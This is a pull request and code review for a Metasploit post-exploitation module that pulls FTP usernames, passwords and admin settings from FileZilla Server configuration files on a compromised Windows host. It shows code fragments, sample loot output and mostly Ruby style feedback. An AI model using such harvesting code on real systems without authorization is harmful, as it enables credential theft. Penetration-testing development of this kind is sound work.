### PR TITLE
Fix FileZilla_Server

### PR DESCRIPTION
**Pull request by g0tmi1k**
## Summary
- Passwords & groups values where the **same for the first user** (repeated for every user afterwards) - display and loot
- Permissions were **same for the first user** (in loot) (repeated for every user afterwards)
- **Failed to detect correct** 'FTP Port' when using default settings
- **Wasn't using** `FileZilla Server Interface.xml` file at all 
- **Hide output** if/when group is empty
- _...more **verbose**!_
## Setup

```
use post/windows/gather/credentials/filezilla_server
set session 1
set verbose true
db_disconnect
```
## Before

```
msf post(filezilla_server) > run

[*] Checking for Filezilla Server directory in: C:\Program Files (x86)\FileZilla Server\
[*] Found FileZilla Server

[*]     Collected the following credentials:
[*]     Username: <USER_1>
[*]     Password: <PASSWORD_1>
[*]        Group: <GROUP_1>

[*]     Collected the following credentials:
[*]     Username: <USER_2>
[*]     Password: <PASSWORD_1>
[*]        Group: <GROUP_1>

[*]     Collected the following credentials:
[*]     Username: <USER_3>
[*]     Password: <PASSWORD_1>
[*]        Group: <GROUP_1>

[*]     Collected the following credentials:
[*]     Username: <USER_4>
[*]     Password: <PASSWORD_1>
[*]        Group: <GROUP_1>

[*]     Collected the following credentials:
[*]     Username: <USER_5>
[*]     Password: <PASSWORD_1>
[*]        Group: <GROUP_1>

[*]     Collected the following credentials:
[*]     Username: <USER_6>
[*]     Password: <PASSWORD_1>
[*]        Group: <GROUP_1>

[*]     Collected the following credentials:
[*]     Username: <USER_7>
[*]     Password: <PASSWORD_1>
[*]        Group: <GROUP_1>

[!] No active DB -- Credential data will not be saved!
[*]     Collected the following configuration details:
[*]        FTP Port: 14147
[*]     FTP Bind IP: 
[*]             SSL: false
[*]      Admin Port: <none>
[*]   Admin Bind IP: 
[*]      Admin Pass: <none>

[*] (No admin information found.)
[*] Credentials saved in: /root/.msf4/loot/20150711181917_default_192.168.1.2_filezilla.server_688042.txt
[*] Permissions saved in: /root/.msf4/loot/20150711181917_default_192.168.1.2_filezilla.server_583100.txt
[*] Config saved in: /root/.msf4/loot/20150711181917_default_192.168.1.2_filezilla.server_212868.txt
[*] Post module execution completed
msf post(filezilla_server) > 
```
## After

```
msf post(filezilla_server) > run

[*] Checking for Filezilla Server directory in: C:\Program Files (x86)\FileZilla Server\
[*] Configuration File Found: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.xml
[*] Configuration File Found: C:\Program Files (x86)\FileZilla Server\FileZilla Server.xml
[+] Found FileZilla Server on <TARGET> via session ID: 1

[*] Collected the following credentials:
[*]     Username: <USER_1>
[*]     Password: <PASSWORD_1>
[*]        Group: <GROUP_1>

[*]     Username: <USER_2>
[*]     Password: <PASSWORD_2>
[*]        Group: <GROUP_2>

[*]     Username: <USER_3>
[*]     Password: <PASSWORD_3>

[*]     Username: <USER_4>
[*]     Password: <PASSWORD_4>

[*]     Username: <USER_5>
[*]     Password: <PASSWORD_5>

[*]     Username: <USER_6>
[*]     Password: <PASSWORD_6>

[*]     Username: <USER_7>
[*]     Password: <PASSWORD_7>

[!] No active DB -- Credential data will not be saved!
[*] Detected Default Adminstration Settings:
[*]        FTP Port: 21
[*]     FTP Bind IP: 0.0.0.0
[*]             SSL: false
[*]      Admin Port: 14147
[*]   Admin Bind IP: 0.0.0.0
[*]      Admin Pass: <none>

[*] Last Server Information:
[*]          IP: 127.0.0.1
[*]        Port: 14147
[*]    Password: <none>

[*] Credentials saved in: /root/.msf4/loot/20150711182115_default_192.168.1.2_filezilla.server_678817.txt
[*] Permissions saved in: /root/.msf4/loot/20150711182115_default_192.168.1.2_filezilla.server_118015.txt
[*]      Config saved in: /root/.msf4/loot/20150711182115_default_192.168.1.2_filezilla.server_800083.txt
[*]  Last server history: /root/.msf4/loot/20150711182115_default_192.168.1.2_filezilla.server_188488.txt

[*] Post module execution completed
msf post(filezilla_server) >
```

_...Skipping comparing log/loot files output._

### CODE REVIEW

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 1]
```diff
@@ -55,26 +55,28 @@ def check_filezilla
     end
 
     session.fs.dir.foreach(path) do |fdir|
-      if fdir =~ /FileZilla\sServer.*\.xml/i
-        paths << path + fdir
+      ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do|xmlfile|
+        if fdir.eql? xmlfile
+          pathtmp = File.join(path + xmlfile)
+          vprint_status("Configuration File Found: %s" % pathtmp)
```
Comment (void-in) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Not a big deal but would be better to use ruby convention here:
```ruby
vprint_status("Configuration file found: #{pathtmp}")
```

Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Theres a few like this. Will do another commit.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 2]
```diff
@@ -224,70 +225,89 @@ def get_filezilla_creds(paths)
...
-
     end
 
+    vprint_status("       FTP Port: %s" % config['ftp_port'])
+    vprint_status("    FTP Bind IP: %s" % config['ftp_bindip'])
+    vprint_status("            SSL: %s" % config['ssl'])
+    vprint_status("     Admin Port: %s" % config['admin_port'])
+    vprint_status("  Admin Bind IP: %s" % config['admin_bindip'])
+    vprint_status("     Admin Pass: %s" % config['admin_pass'])
+    vprint_line("")
```
Comment (void-in) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Ruby convention for string interpolation should be used.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 3]
```diff
@@ -224,70 +225,89 @@ def get_filezilla_creds(paths)
...
+
+
+    lastser = parse_interface(fsi_xml)
+    lastserver << [lastser['ip'], lastser['port'], lastser['password']]
+
+    vprint_status("Last Server Information:")
+    vprint_status("         IP: %s" % lastser['ip'])
+    vprint_status("       Port: %s" % lastser['port'])
+    vprint_status("   Password: %s" % lastser['password'])
+    vprint_line("")
```
Comment (void-in) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Ruby convention for string interpolation should be used. Also no need for vprint_line(""). Just vprint_line is sufficient.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 4]
```diff
@@ -224,70 +225,89 @@ def get_filezilla_creds(paths)
...
     p = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv,
       "filezilla_server_configuration.csv", "FileZilla FTP Server Configuration")
+    print_status("     Config saved in: #{p.to_s}")
+
+    p = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv,
+      "filezilla_server_lastserver.csv", "FileZilla FTP Last Server")
+    print_status(" Last server history: #{p.to_s}")
 
-    print_status("Config saved in: #{p.to_s}")
+    print_line("")
```
Comment (void-in) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Only print_line is sufficient.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 5]
```diff
@@ -342,37 +360,33 @@ def parse_server(data)
...
       account['port'] = settings['ftp_port']
       account['ssl']  = settings['ssl']
       creds << account
 
-      vprint_status("    Collected the following credentials:")
       vprint_status("    Username: %s" % account['user'])
       vprint_status("    Password: %s" % account['password'])
-      vprint_status("       Group: %s" % account['group'])
+      vprint_status("       Group: %s" % account['group']) if account['group'] != nil
       vprint_line("")
```
Comment (void-in) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Ruby convention for string interpolation should be used. Also no need for vprint_line(""). Just vprint_line is sufficient.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 6]
```diff
@@ -342,37 +360,33 @@ def parse_server(data)
...
     end
 
+    # Rather than printing out all the values, just count up
     groups = groups.uniq unless groups.uniq.nil?
     if !datastore['VERBOSE']
-      print_status("    Collected the following credentials:")
+      print_status("Collected the following credentials:")
       print_status("    Usernames: %u" % users)
       print_status("    Passwords: %u" % passwords)
       print_status("       Groups: %u" % groups.length)
```
Comment (void-in) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Ruby convention for string interpolation should be used.

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 2 above)
Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]:
```
[-] Post failed: ArgumentError wrong number of arguments (0 for 1)
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/module/ui/line/verbose.rb:3:in `vprint_line'
```

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 3 above)
Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]:
```
[-] Post failed: ArgumentError wrong number of arguments (0 for 1)
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/module/ui/line/verbose.rb:3:in `vprint_line'
```

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 5 above)
Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]:
```
[-] Post failed: ArgumentError wrong number of arguments (0 for 1)
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/module/ui/line/verbose.rb:3:in `vprint_line'
```

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 1 above)
Comment (void-in) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Yeah. This convention is used in a few places outside this PR as well. I believe the original author was a python programmer as well!.

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 4 above)
Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]:
```
[-] Post failed: ArgumentError wrong number of arguments (0 for 1)
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/module/ui/line/verbose.rb:3:in `vprint_line'
```

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 6 above)
Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Done

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 1 above)
Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: I was just using what I was given ;)

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 2 above)
Comment (void-in) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Sorry about that. It is strange that the calling convention of print_line and vprint_line is different. For example, take a look at https://github.com/rapid7/metasploit-framework/blob/e749733eb6118a4b089e288fc81050f76c8db5ed/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb#L39

Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: ...I smell another PR =).

Comment (void-in) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: @g0tmi1k +1: Empty verbose line is sort of difficult to imagine at first but in this case it makes complete sense.

**Comment by wvu-r7** [comment]
@g0tmi1k: Do you actually use this, or do you just like fixing things? ;)

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 7]
```diff
@@ -224,70 +225,89 @@ def get_filezilla_creds(paths)
...
-
     end
 
+    vprint_status("       FTP Port: #{config['ftp_port']}")
+    vprint_status("    FTP Bind IP: #{config['ftp_bindip']}")
+    vprint_status("            SSL: #{config['ssl']}")
+    vprint_status("     Admin Port: #{config['admin_port']}")
+    vprint_status("  Admin Bind IP: #{config['admin_bindip']}")
+    vprint_status("     Admin Pass: #{config['admin_pass']}")
+    vprint_line('')
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: https://github.com/rapid7/metasploit-framework/pull/5702#issuecomment-120635713

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 8]
```diff
@@ -224,70 +225,89 @@ def get_filezilla_creds(paths)
...
+
+
+    lastser = parse_interface(fsi_xml)
+    lastserver << [lastser['ip'], lastser['port'], lastser['password']]
+
+    vprint_status("Last Server Information:")
+    vprint_status("         IP: #{lastser['ip']}")
+    vprint_status("       Port: #{lastser['port']}")
+    vprint_status("   Password: #{lastser['password']}")
+    vprint_line('')
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: https://github.com/rapid7/metasploit-framework/pull/5702#issuecomment-120635713

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 9]
```diff
@@ -342,45 +360,63 @@ def parse_server(data)
...
 
-      vprint_status("    Collected the following credentials:")
-      vprint_status("    Username: %s" % account['user'])
-      vprint_status("    Password: %s" % account['password'])
-      vprint_status("       Group: %s" % account['group'])
-      vprint_line("")
+      vprint_status("    Username: #{account['user']}")
+      vprint_status("    Password: #{account['password']}")
+      vprint_status("       Group: #{account['group']}") if account['group'] != nil
+      vprint_line('')
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: https://github.com/rapid7/metasploit-framework/pull/5702#issuecomment-120635713

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 10]
```diff
@@ -342,45 +360,63 @@ def parse_server(data)
...
+
+    opt = doc.elements.to_a("Settings/Item")
+
+    lastser['ip']       = opt[0].text rescue "<none>"
+    lastser['port']     = opt[1].text rescue "<none>"
+    lastser['password'] = opt[2].text rescue "<none>"
+
+    lastser['password'] = "<none>" if lastser['password'] == nil
+
+    return lastser
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Explicit ```return``` unnecessary.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 11]
```diff
@@ -342,45 +360,63 @@ def parse_server(data)
...
+      print_error("Invalid xml format")
+    end
+
+    opt = doc.elements.to_a("Settings/Item")
+
+    lastser['ip']       = opt[0].text rescue "<none>"
+    lastser['port']     = opt[1].text rescue "<none>"
+    lastser['password'] = opt[2].text rescue "<none>"
+
+    lastser['password'] = "<none>" if lastser['password'] == nil
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: ```if lastser['password'].nil?``` or ```unless lastser['password']``` (subtly different).

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 12]
```diff
@@ -309,30 +329,28 @@ def parse_server(data)
...
-    end
+    settings['ssl_certfile'] = "<none>" if settings['ssl_certfile'].nil?
 
     settings['ssl_keypass'] = items[50].text rescue "<none>"
+    settings['ssl_keypass'] = "<none>" if settings['ssl_keypass'].nil?
 
-    if settings['ssl_keypass'].nil?
-      settings['ssl_keypass'] = "<none>"
-    end
+    vprint_status("Collected the following credentials:") if !doc.elements['Users'].nil?
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: ```if doc.elements['Users']``` (subtly different).

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 11 above)
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: ```if lastser['password'].nil?``` instead.

**Comment by wvu-r7** [comment]
Try to be consistent with your ```nil``` checks. You can do ```if something.nil?``` instead of ```if something == nil```. If there's negation involved, ```unless``` is more idiomatic, but it can be confusing as hell sometimes.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 13]
```diff
@@ -55,26 +55,28 @@ def check_filezilla
     end
 
     session.fs.dir.foreach(path) do |fdir|
-      if fdir =~ /FileZilla\sServer.*\.xml/i
-        paths << path + fdir
+      ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do|xmlfile|
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Missing a space after ```do```.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 14]
```diff
@@ -122,11 +124,28 @@ def get_filezilla_creds(paths)
...
+    'Indent'    => 1,
+    'Columns'   =>
+    [
+      "IP",
+      "Port",
+      "Password"
+    ])
+
+
+    paths.each do|path|
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Missing a space after ```do```.

**Comment by g0tmi1k** [comment]
@wvu-r7 Why can't it be both (using & fixing ;))! 

Thanks for the ruby tips _(as always)_ - all noted & fixed (hopefully!).
Didn't know ruby would be so 'relax' with it (I'll be stricter next time!)

**Comment by wvu-r7** [comment]
Puts the onus on us to write clean, consistent code. :)

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 15]
```diff
@@ -36,11 +40,10 @@ def run
     @progs = "#{session.sys.config.getenv('ProgramFiles')}\\"
 
     filezilla = check_filezilla
-    if filezilla != nil
-      get_filezilla_creds(filezilla)
-    end
+    get_filezilla_creds(filezilla) if !filezilla.nil?
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: You can use ```if filezilla``` here.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 16]
```diff
@@ -55,26 +58,28 @@ def check_filezilla
     end
 
     session.fs.dir.foreach(path) do |fdir|
-      if fdir =~ /FileZilla\sServer.*\.xml/i
-        paths << path + fdir
+      ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile|
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Is this ```each``` necessary?

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 17]
```diff
@@ -55,26 +58,28 @@ def check_filezilla
...
+        if fdir.eql? xmlfile
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Why ```eql?```?

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 18]
```diff
@@ -55,26 +58,28 @@ def check_filezilla
...
+          filepath = File.join(path + xmlfile)
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: You're using ```File.join``` on a concatenated string.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 19]
```diff
@@ -122,11 +127,28 @@ def get_filezilla_creds(paths)
       "SSL Key Password"
     ])
 
-    file = session.fs.file.new(paths[1], "rb")
-    until file.eof?
-      fs_xml << file.read
+    lastserver = Rex::Ui::Text::Table.new(
+    'Header'    => "FileZilla FTP Last Server",
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Indentation is off.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 20]
```diff
@@ -122,11 +127,28 @@ def get_filezilla_creds(paths)
...
+    'Indent'    => 1,
+    'Columns'   =>
+    [
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Same here.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 21]
```diff
@@ -224,70 +228,89 @@ def get_filezilla_creds(paths)
...
+    settings['bindip']     = opt[38].text rescue ""
+    settings['ssl']        = opt[42].text rescue ""
 
-    # make the bindip a little easier to understand
-    if settings['ftp_bindip'] == "*"
-      settings['ftp_bindip'] = "0.0.0.0"
-    end
+    # empty means localhost only * is 0.0.0.0
+    settings['local_host'] ? (settings['admin_bindip'] = settings['local_host']) : (settings['admin_bindip'] = "127.0.0.1")
+    settings['admin_bindip'] = "0.0.0.0" if settings['admin_bindip'] == "*" or settings['admin_bindip'].empty?
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: We prefer ```||```.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 22]
```diff
@@ -224,70 +228,89 @@ def get_filezilla_creds(paths)
...
+
+    settings['bindip'] ? (settings['ftp_bindip'] = settings['bindip']) : (settings['ftp_bindip'] = "127.0.0.1")
+    settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" or settings['ftp_bindip'].empty?
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Same here.

File: modules/post/windows/gather/credentials/filezilla_server.rb [hunk 23]
```diff
@@ -342,53 +363,69 @@ def parse_server(data)
...
+    lastser['password'] = opt[2].text rescue "<none>"
+
+    lastser['password'] = "<none>" if lastser['password'].nil?
+
+    lastser
   end
 
+
+  def got_root?
+    session.sys.config.getuid =~ /SYSTEM/ ? (true) : (false)
```
Comment (wvu-r7) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Why parens?

**Comment by wvu-r7** [comment]
Next time, try not to use so many one-liners, especially with ternary. It's fine for one-off things, but it gets hard to read after a while.

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 17 above)
Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: Because I believe its needed?

File: modules/post/windows/gather/credentials/filezilla_server.rb (hunk 16 above)
Comment (g0tmi1k) [inline modules/post/windows/gather/credentials/filezilla_server.rb]: I believe so!

**Comment by g0tmi1k** [comment]
All noted =).
Fixed everything except for one of the points (If I drop `each`, ruby errors out - `syntax error, unexpected keyword_do_block, expecting keyword_end`)

**Comment by void-in** [comment]
@g0tmi1k Don't remove the each word because it is used for enum the array elements. The syntax is correct. May be @wvu-r7  was asking about something else. Some more clarity is needed here.

**Comment by wvu-r7** [comment]
Lol, sorry for the confusion. I was asking if it was necessary to loop through two filenames, not remove the ```each```. I think it's fine now that I looked at it again.

**Comment by wvu-r7** [comment]
@g0tmi1k: Would appreciate it if you could test the code with the new changes when you get a chance. Thanks!

**Comment by g0tmi1k** [comment]
Tested before commit =)

**Comment by wvu-r7** [comment]
Ship it!

**Comment by g0tmi1k** [comment]
Woop! =)
